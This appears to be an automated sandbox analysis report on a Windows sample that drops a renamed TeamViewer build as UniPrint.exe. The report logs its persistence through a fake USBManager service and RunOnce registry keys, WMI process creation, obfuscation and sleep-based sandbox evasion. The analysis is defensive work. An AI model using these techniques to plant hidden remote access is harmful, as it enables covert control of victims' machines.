Source: C:\Users\user\Desktop\wogZe27GBB.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\wogZe27GBB.exe 'C:\Users\user\Desktop\wogZe27GBB.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_70985F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004C6E36 AdjustTokenPrivileges, 4_2_004C6E36
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 4_2_70985F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Local\Temp\nsaF7DE.tmp Jump to behavior
Source: classification engine Classification label: mal76.evad.winEXE@23/18@4/5
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982AC0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,StrChrW,StrChrW,SysAllocString,StrChrW,SysAllocString,SysFreeString,VariantInit,VariantInit,StrChrW,StrChrW,lstrlenW,SysAllocStringLen,PathQuoteSpacesW,VariantInit,StrChrW,SysAllocString,StrChrW,VariantInit,StrChrW,StrChrW,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 2_2_70982AC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle, 2_2_70983DC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle, 4_2_70983DC0
Source: C:\Users\user\Desktop\wogZe27GBB.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,74E3A680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404356
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70989B10 SwitchDesktop,SetThreadDesktop,LoadLibraryW,GetProcessHeap,HeapAlloc,RtlZeroMemory,GetSystemDirectoryW,PathAddBackslashW,lstrcatW,LoadLibraryExW,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,StrChrW,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep, 2_2_70989B10
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70983DC0 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle, 2_2_70983DC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAAFKBAAAA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6032:120:WilError_01
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70985180 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource, 2_2_70985180
Source: C:\Users\user\Desktop\wogZe27GBB.exe File written: C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.ini Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: wogZe27GBB.exe Static file information: File size 1773472 > 1048576
Source: wogZe27GBB.exe Static PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053E60D push ecx; ret 4_2_0053E620
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053BD8D push ecx; ret 4_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0295E1DD push esp; retf 17_3_0295E4B1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02960970 push eax; retf 17_3_02960971
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02935295 push ebx; iretd 17_3_029353CB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0293209A push ebx; retf 17_3_0293209B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292D483 push ebx; retf 17_3_0292D4FF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029304A8 push ebx; retn 0019h 17_3_0293052F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029314AE push ebx; ret 17_3_029314AF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02931AD5 push ebx; iretd 17_3_02931AE3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02931CC2 push ebx; ret 17_3_02931D03
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029308C9 push ebx; iretd 17_3_02930A97
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292EEFF push 00000029h; iretd 17_3_0292EF04
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029330E2 push ebx; retf 17_3_029330E3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02930E14 push ebx; ret 17_3_02930F2B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02931004 push cs; iretd 17_3_02931005
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02931836 push ebx; retf 17_3_029318C3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02930039 push ebx; retf 0021h 17_3_029300B7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0293083E push ebx; retf 17_3_0293083F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02933222 push ebx; ret 17_3_0293324B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292D826 push ebx; retf 17_3_0292D827
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0293042A push ebx; ret 17_3_029304A7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02933E40 push ebx; retf 17_3_02933E47
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0293027C push ebx; iretd 17_3_02930287
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292DC6A push ebx; ret 17_3_0292DC6B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029363B2 push ebx; iretd 17_3_029363B3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029369B4 push ebx; iretd 17_3_029369BF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02936BA1 push ebx; retf 17_3_02936CFF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029351AA push ebx; retf 17_3_029351AB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029357DD push ebx; retf 17_3_029359BB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02936F17 push ebx; iretd 17_3_02936F1F
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405E88

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll Jump to dropped file
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll Jump to dropped file
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW, 4_2_004E177C

Boot Survival:

barindex
Creates or modifies windows services
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70983920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW, 2_2_70983920
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\wogZe27GBB.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004FB7F9 4_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004DC9D6 4_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00500C6A 4_2_00500C6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004FFF68 4_2_004FFF68
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 6704 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 7164 Thread sleep count: 103 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 7164 Thread sleep time: -51500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 2392 Thread sleep count: 80 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 2392 Thread sleep time: -40000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_7098B420
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004FFF68 4_2_004FFF68
Contains functionality to query network adapater information
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo, 4_2_004B9A29
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetAdaptersInfo, 4_2_709888E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose, 0_2_00405E61
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040263E FindFirstFileA, 0_2_0040263E
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_0040548B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 2_2_70982EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 2_2_70982960
